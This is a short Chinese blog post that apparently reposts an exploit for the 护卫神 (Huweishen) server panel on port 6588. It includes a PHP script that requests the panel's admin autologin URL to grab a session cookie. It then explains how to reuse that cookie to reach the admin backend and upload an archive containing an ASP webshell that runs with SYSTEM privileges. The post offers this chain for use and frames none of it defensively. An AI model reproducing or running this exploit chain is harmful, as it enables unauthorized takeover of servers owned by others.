护卫神6588端口提权漏洞 - 分析技术网

护卫神6588端口提权漏洞

作者: SX分析技术网

全网最全的网络资源分享网站

手机扫码查看

标签:

防攻击

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,特殊资源除外,如有侵权请联系!

分享本文至:

shell权限

可执行脚本

<?php function httpGet() { $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_TIMEOUT, 120); $result = curl_exec($ch); return $result; } echo httpGet(); echo asd; ?>
上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

分享到:
打赏
未经允许不得转载:

作者: SX分析技术网, 转载或复制请以 超链接形式 并注明出处 分析技术网
原文地址: 《护卫神6588端口提权漏洞》 发布于2019-11-28

评论

未显示?请点击刷新
切换注册

登录

您也可以使用第三方帐号快捷登录

切换登录

注册

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

分析技术网《www.caiwuje.cn》

本站(自动收录友链)

分析技术网 (www.caiwuje.cn) 网站博客,博客网站制作,个人技术博客,个人博客网站,个人seo,自媒体博客,个人seo优化,移动端web框架,shift后门,dede密码重置,mysql添加用户,nginx解析漏洞,web安全扫描工具,wooyun镜像,iis解析漏洞,网易云解析,struts2漏洞利用工具,metasploit渗透测试指南,漏洞测试,远程命令执行

申请友链

给我留言